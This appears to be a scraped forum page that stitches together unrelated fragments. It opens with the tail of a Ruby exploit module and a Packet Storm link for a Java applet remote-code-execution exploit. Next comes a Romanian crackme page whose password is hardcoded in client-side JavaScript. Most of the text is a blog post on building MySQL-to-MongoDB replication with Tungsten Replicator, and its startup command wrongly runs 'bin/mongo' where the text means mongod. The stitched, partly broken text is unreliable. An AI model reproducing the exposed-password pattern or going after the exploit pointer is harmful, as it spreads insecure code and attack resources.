def generate_jar() @jar_data end end http://packetstorm.crazydog.pt/1207-exploits/java_verifier_field_access.rb.txt Source Java Applet Field Bytecode Verifier Cache Remote Code Execution ? Packet Storm
  20. <html> <head> <script type="text/javascript"> function show_prompt() { var pass=prompt("Password?","******"); var pass1 = "rst" if (pass === pass1) { document.write("<p>The password is: " + pass + "! Bravo!!!</p>"); } else { document.write("<p>Wrong! "+ pass +"</p>") } } </script> </head> <body> <p>Password:</p> <input type="button" onclick="show_prompt()" value="Login" /> </body> </html> Care e parola? PS : Lasati nobii sa incerce!
  21. The last article on this blog described our planned MySQL to MongoDB replication hackathon at the recent Open DB Camp in Sardinia. Well, it worked, and the code is now checked into the Tungsten Replicator project. This article describes exactly what we did to write the code and set up replication. You can view it as a kind of cookbook both for implementing new database types in Tungsten as well as setting up replication to MongoDB. The Team MySQL to MongoDB replication was a group effort with three people: Flavio Percoco, Stephane Giron, and me. Flavio has worked on MongoDB for a couple of years and is extremely well-informed both on database setup as well as application design. Stephane Giron is a replication engineer at Continuent and has done a substantial amount of the work on data extraction from MySQL, especially row replication. I work on the core execution framework as well as performance. Getting Started with MongoDB There were a couple of talks on MongoDB during the first morning of Open DB camp (Saturday May 7th), which Stephane and I dutifully attended to raise our consciousness. We got cracking on implementation around 2pm that afternoon. The first step was to bring up MongoDB 1.8.1 and study its habits with help from Flavio. MongoDB is definitely easy to set up. You get binary builds from the MongoDB download page. Here is a minimal set of commands to unpack MongoDB 1.8.1 and start the mongod using directory data to hold tables. $ tar -xvzf mongodb-osx-x86_64-1.8.1.tgz $ cd mongodb-osx-x86_64-1.8.1 $ mkdir data $ bin/mongo --dbpath data (... messages ...) You connect to mongod using the mongo client. Here's an example of connecting and creating a table with a single row. This is schema-less programming in action. You just insert BSON documents (BSON = Binary JSON) into collections, which is Mongolese for tables. MongoDB creates the collection for you as soon as you put something in it. The automatic materialization is quite addictive once you get used to it, which takes about 5 minutes. The MongoDB client language is really handy. It is based on JavaScript. There are what seem to be some non-Javascript commands like "show dbs" to show databases or "show collections" to list the tables. Everything else is object-oriented and easy to understand. For example, to find all the records in collection test, as we saw above, you just connect to the database and issue a command on the local db object. Collections appear as properties of db, and operations on the collection are methods. It helps that the MongoDB folks provide very accessible documentation, for example a SQL to MongoDB translation chart. I put together a little practice program using the MongoDB Java driver to insert, referring to the Javadoc for the class library when in doubt about API calls. There are also a couple of very helpful examples, like this one, included with the driver. All told, setup and orientation took us about 45 minutes. It helped enormously that Flavio is a MongoDB expert, which minimized flail considerably. Implementing Basic Replication from MySQL to MongoDB After setup we proceeded to implement replication. Here is an overview of the replicator pipeline to move data from MySQL to MongoDB. Pipelines are message processing flows within the replicator. Direct pipelines move data from DBMS to another within a single replicator. They are already a standard part of Tungsten Replicator and most of the code shown above already exists, except for the parts shown in red. Before we started, we therefore needed to set up a replicator with a direct pipeline. We first built the code according to the instructions on the Tungsten project wiki, uploaded the binary to our test host, and configured the replicator. First, we ran the Tungsten configure script to set defaults for the MySQL server (user name, extract method, etc.). Next we ran the configure-service command to set up the direct pipeline configuration file. Both commands together look like the following: ./configure ./configure-service -C --role=direct mongodb The second command created a file called tungsten-replicator/conf/static-mongodb.properties with all the information about the direct pipeline implementation but of course nothing yet about MongoDB. Now we could start the implementation. To move data to MongoDB, we needed two new components: A Tungsten RawApplier to apply row updates to MongoDB. RawApplier is the basic interface you implement to create an applier to a database. A Tungsten Filter to stick column names on row updates after extracting from MySQL. MySQL row replication does not do this automatically, which makes it difficult to construct JSON at the other end because you do not have the right property names. To get started on the applier I implemented a very simple class named MongoApplier that could take an insert from MySQL, turn it into a BSON document, and add it to an equivalently named database and collection in MongoDB. I added this to the replicator code tree, then built and uploaded tungsten-replicator.jar. (Use 'ant dist' in the replicator directory to build the JAR.) To start using the new MongoDB applier, we needed to edit the service properties file to use this component instead of the standard MySQL applier that configuration adds by default. To do this, you can open up static-mongodb.properties with your favorite editor. Add the following properties at the bottom of the APPLIERS section. Next, you need to fix up the direct pipeline so that the last stage uses the new applier. We located the direct pipeline definition (around line 208 in the properties file) and set the applier to mongodb as shown in the following example. We then started the replicator using 'replicator start.' At that point we could do the following on MySQL: mysql> create table foo(id int primary key, msg varchar(35)); Query OK, 0 rows affected (0.05 sec) mysql> insert into foo values(1, 'hello from MySQL!'); Query OK, 1 row affected (0.00 sec) ...And within a second we could see the following over in MongoDB: This kind of progress was very encouraging. It took roughly 2 hours to get to move the first inserts across. Compared to replicating to a new SQL database like Oracle that's lightning fast. However, there were still no property names because we were not adding column names to row updates. Meanwhile, Stephane had finished the column name filter (ColumnNameFilter) and checked it in. I rebuilt and refreshed the replicator code, then edited static-mongodb.properties as follows to add the filter. First put in the filter definition in the FILTERS section: Next, make the first stage of the direct pipeline use the filter: We then restarted the replicator. Thereupon, we started to see inserts like the following, complete with property names: That was better, much better! To this point we had put in exactly 2 hours and 45 minutes wall clock time. It was enough to prove the point and more than enough for a demo the next day. The hackathon was a rousing success. Further Development Over the next couple of days I rounded out the MongoApplier to add support for UPDATE and DELETE operations, as well as to implement restart. The full implementation is now checked in on code.google.com, so you can repeat our experiences by downloading code and building yourself or by grabbing one of the Tungsten nightly builds. Restart is an interesting topic. Tungsten uses a table to store the sequence number of the last transaction it applied. We do this by creating an equivalent collection in MongoDB, which is updated after each commit. There is a problem in that MongoDB does not have transactions. Each update is effectively auto-commit, much like MyISAM table type on MySQL. This means that while Tungsten can restart properly after a clean shutdown, slave replication is not crash safe. Lack of atomic transactions is a bigger issue with MongoDB and other NoSQL databases that goes far beyond replication. For now, this is just how Tungsten's MongoDB support works. Speaking of things that don't work, the current implementation is a prototype only. We have not tested it with more than a few data types. It only works with a single MongoDB daemon. It does not set keys properly or specify indexes on tables. There are no guarantees about performance, except to say that if you had more than a small amount of data it would be quite slow. (OK, that's a guarantee after all.) Epilog Overall all the hackathon was a great success, not to mention lots of fun. It went especially well because we had a relatively small problem and three people (Stephane, Flavio, and Robert) with complementary skills that we could combine easily for a quick solution. That seems to be a recipe for succeeding on future hackathons. From a technical point of view, it helped that MongoDB is schema-less. Unlike SQL databases, just adding a document materializes the table in MongoDB. This made our applier implementation almost trivially easy, because processing row updates takes only a few dozen lines of Java code in total. It also explains why a lot of people are quite attached to the NoSQL programming model. I am looking forward to learning a lot more about MongoDB and other NoSQL databases. It would take two or three weeks of work to get our prototype to work with real applications. Also, it looks as if we can implement replication going from MongoDB to MySQL. According to Flavio there is a way to search the transaction log of MongoDB as a regular collection. By appropriately transforming BSON objects back to SQL tuples, we can offer replication back to MySQL. There are many other lessons about MongoDB and NoSQL in general but it seems best to leave them for a future article when I have more experience and actually know what I'm talking about. Meanwhile, you are welcome to try out our newest Tungsten replication feature. Source: scale-out-blog.blogspot.com
×
×
  • Create New...